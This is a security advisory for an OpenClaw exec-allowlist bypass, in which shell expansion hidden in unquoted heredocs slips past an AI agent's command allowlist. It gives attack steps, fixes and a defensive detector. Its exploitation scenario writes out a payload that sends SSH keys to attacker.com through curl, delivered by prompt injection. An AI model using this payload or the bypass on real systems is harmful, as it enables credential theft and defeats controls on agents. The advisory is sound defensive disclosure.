GHSA-x3h8-jrgh-p8jx: OpenClaw: exec allowlist bypass allows hidden shell code

GHSA-x3h8-jrgh-p8jx MEDIUM
Published May 4, 2026
CISO Take

OpenClaw's exec allowlist — the mechanism designed to constrain which shell commands an AI agent may run — can be deceived by embedding shell expansion inside an unquoted heredoc body. The allowlist evaluator approves the command as written, but the shell executes the hidden expansion at runtime, enabling arbitrary code execution beyond what was authorized. With 135 prior CVEs in the same package and 4 downstream dependents, OpenClaw's security posture should already be under scrutiny for any team using it in agentic pipelines; this bypass targets a core safety boundary. Upgrade to v2026.4.22 immediately and, if upgrading is blocked, audit all allowlisted commands for heredoc syntax and temporarily prohibit heredoc usage in agent command templates.

Sources: GitHub Advisory ATLAS

What is the risk?

Medium severity overall, but elevated in AI agent deployments where the exec allowlist is the last control between LLM-driven decisions and arbitrary system command execution. Exploitation requires the ability to inject a heredoc-containing command — achievable via prompt injection or by any actor with command-submission access to the agent. No active exploitation is confirmed (not in KEV, no public exploit, no EPSS data), but the pattern of 135 CVEs in the same package signals systemic security debt. The blast radius is bounded by the agent process's runtime privileges, but autonomous agent pipelines may run with elevated permissions.

How does the attack unfold?

  1. Allowlist Evasion (AML.T0107)
     Adversary crafts a shell command containing an unquoted heredoc whose body embeds shell expansion tokens (e.g., $(...)) that the OpenClaw exec allowlist analyzer scans but does not reject.

  2. Agent Tool Invocation (AML.T0053)
     The crafted command is submitted to the OpenClaw agent, either directly by an attacker with command-submission access or via a prompt injection that manipulates the agent into generating the heredoc-containing command.

  3. Shell Execution (AML.T0050)
     The OS shell evaluates the heredoc body at runtime and executes the hidden shell expansion with the full privileges of the agent process, bypassing all allowlist restrictions.

  4. Impact
     Attacker achieves arbitrary code execution in the agent's runtime environment, enabling credential theft, data exfiltration, lateral movement, or persistence depending on agent process privileges.

What systems are affected?

Package: OpenClaw
Ecosystem: npm
Vulnerable Range: <= 2026.4.21
Patched: 2026.4.22

4 dependents; 36% patched; ~3d to patch

Do you use OpenClaw? You're affected.

How severe is it?

CVSS 3.1: N/A
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Moderate

What should I do?

5 steps
  1. Upgrade openclaw to v2026.4.22 immediately (fix commit b2e8b7d4).

  2. If upgrade is blocked, audit all allowlisted commands for unquoted heredoc operators (<<) and either remove them or replace with quoted heredocs (<<'EOF').

  3. Apply least-privilege to agent execution environments — run agents in sandboxed containers with restricted filesystem and network access.

  4. Add detection for heredoc patterns in command audit logs (monitor for << tokens in agent-submitted commands).

  5. Review agent tool definitions that accept user-supplied or LLM-generated input for command template injection paths.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 9 - Risk management system
ISO 42001
8.4 - System and data controls
NIST AI RMF
MEASURE 2.5 - AI system risks are monitored and human oversight informed
OWASP LLM Top 10
LLM02 - Sensitive Information Disclosure
LLM06 - Excessive Agency

Frequently Asked Questions

What is GHSA-x3h8-jrgh-p8jx?

OpenClaw's exec allowlist — the mechanism designed to constrain which shell commands an AI agent may run — can be deceived by embedding shell expansion inside an unquoted heredoc body. The allowlist evaluator approves the command as written, but the shell executes the hidden expansion at runtime, enabling arbitrary code execution beyond what was authorized. With 135 prior CVEs in the same package and 4 downstream dependents, OpenClaw's security posture should already be under scrutiny for any team using it in agentic pipelines; this bypass targets a core safety boundary. Upgrade to v2026.4.22 immediately and, if upgrading is blocked, audit all allowlisted commands for heredoc syntax and temporarily prohibit heredoc usage in agent command templates.

Is GHSA-x3h8-jrgh-p8jx actively exploited?

No confirmed active exploitation of GHSA-x3h8-jrgh-p8jx has been reported, but organizations should still patch proactively.

How to fix GHSA-x3h8-jrgh-p8jx?

  1. Upgrade openclaw to v2026.4.22 immediately (fix commit b2e8b7d4).

  2. If upgrade is blocked, audit all allowlisted commands for unquoted heredoc operators (<<) and either remove them or replace with quoted heredocs (<<'EOF').

  3. Apply least-privilege to agent execution environments: run agents in sandboxed containers with restricted filesystem and network access.

  4. Add detection for heredoc patterns in command audit logs (monitor for << tokens in agent-submitted commands).

  5. Review agent tool definitions that accept user-supplied or LLM-generated input for command template injection paths.

What systems are affected by GHSA-x3h8-jrgh-p8jx?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI-driven automation pipelines, shell-executing AI agents.

What is the CVSS score for GHSA-x3h8-jrgh-p8jx?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

agent frameworks
AI-driven automation pipelines
shell-executing AI agents

MITRE ATLAS Techniques

AML.T0010.005 AI Agent Tool
AML.T0050 Command and Scripting Interpreter
AML.T0053 AI Agent Tool Invocation
AML.T0107 Exploitation for Defense Evasion

Compliance Controls Affected

EU AI Act: Article 9
ISO 42001: 8.4
NIST AI RMF: MEASURE 2.5
OWASP LLM Top 10: LLM02, LLM06

What are the technical details?

Original Advisory

## Summary

Exec allowlist analysis rejects shell expansion in unquoted heredocs.

## Affected Packages / Versions

- Package: openclaw (npm)
- Affected versions: <= 2026.4.21
- Fixed version: 2026.4.22

## Impact

An allowlisted command containing an unquoted heredoc could hide shell expansion in the heredoc body. That could make the approved command text look safer than what the shell would evaluate at runtime.

## Fix

The exec command analyzer now tracks heredoc bodies, rejects unquoted heredoc expansion tokens and continuation-splice bypasses, and preserves quoted heredocs and literal safe text.

## Fix Commit(s)

- b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5

## Verification

- The fix commit is contained in the public v2026.4.22 tag.
- openclaw@2026.4.22 is published on npm and the compiled package contains the fix.
- Focused regression coverage for this path passed before publication.

OpenClaw thanks @VladimirEliTokarev for reporting.
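As an added example (not OpenClaw's analyzer and not code from the advisory), the check below does what remediation steps 2 and 4 and the fix description above call for: it tracks heredoc bodies, rejoins backslash-newline continuations before looking for the `<<` operator, flags `$` and backtick tokens only inside unquoted bodies, and leaves quoted heredocs alone. Function names and the sample commands are constructed, and tokenization is simplified (here-strings and `<<` inside quotes are not modelled).

```javascript
// Added example, not OpenClaw's own analyzer: scan a command string for shell
// expansion hidden inside unquoted heredoc bodies (bash-style syntax assumed).

// Conservative token set: any '$' or backtick in an unquoted body is rejected;
// literal text belongs in a quoted heredoc (<<'EOF'), which the shell never expands.
const EXPANSION = /[$`]/;

// The shell drops backslash-newline pairs before tokenizing, so an operator or
// delimiter split across lines ("<\" newline "<EOF") is rejoined here first.
function spliceContinuations(cmd) {
  return cmd.replace(/\\\r?\n/g, "");
}

// Find a heredoc operator on one line. Quoting the delimiter word
// ('EOF', "EOF" or \EOF) disables expansion of the body.
function heredocDelimiter(line) {
  const m = /<<(-?)\s*(?:'([^']+)'|"([^"]+)"|\\(\S+)|(\S+))/.exec(line);
  if (!m) return null;
  const stripTabs = m[1] === "-"; // <<- strips leading tabs from body lines
  if (m[5] !== undefined) return { delim: m[5], quoted: false, stripTabs };
  return { delim: m[2] ?? m[3] ?? m[4], quoted: true, stripTabs };
}

// Returns findings as [{line, text}] (1-based, counted after splicing);
// an empty array means no hidden expansion was found.
function findHiddenHeredocExpansion(cmd) {
  const lines = spliceContinuations(cmd).split("\n");
  const findings = [];
  let open = null; // the heredoc whose body we are inside, if any
  for (let i = 0; i < lines.length; i++) {
    if (!open) { open = heredocDelimiter(lines[i]); continue; }
    const body = open.stripTabs ? lines[i].replace(/^\t+/, "") : lines[i];
    if (body === open.delim) { open = null; continue; } // terminator line
    if (!open.quoted && EXPANSION.test(body)) {
      findings.push({ line: i + 1, text: body.trim() });
    }
  }
  // A partially quoted or misspelled delimiter never terminates: fail closed.
  if (open) findings.push({ line: lines.length, text: `unterminated heredoc <<${open.delim}` });
  return findings;
}

// Constructed sample commands (not taken from the advisory).
const hidden = "cat <<EOF > /tmp/app.log\nstatus: ok\nnote: $(id)\nEOF\n";
const safe = "cat <<'EOF' > /tmp/app.log\nstatus: ok\nnote: $(id)\nEOF\n";
console.log(findHiddenHeredocExpansion(hidden)); // one finding on line 3
console.log(findHiddenHeredocExpansion(safe));   // []
```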

Exploitation Scenario

An adversary with prompt injection access to an OpenClaw agent constructs a query that causes the agent to generate a seemingly benign shell command containing an unquoted heredoc — for example, a log-writing command whose heredoc body embeds $(curl attacker.com/exfil?d=$(cat ~/.ssh/id_rsa)). The OpenClaw allowlist analyzer inspects the command text and approves it based on the outer command structure, ignoring the heredoc body. When the agent's runtime passes the command to the shell, the expansion executes out-of-band, exfiltrating SSH keys or other secrets accessible to the agent process. This mirrors the credential-exfiltration pattern observed in AIID #1368, where OpenClaw's skills ecosystem was abused for AMOS stealer delivery.

Weaknesses (CWE)

CWE-200 — Exposure of Sensitive Information to an Unauthorized Actor: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.

  • [Architecture and Design] Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.

Source: MITRE CWE corpus.

Timeline

Published: May 4, 2026
Last Modified: May 4, 2026
First Seen: May 5, 2026

Related Vulnerabilities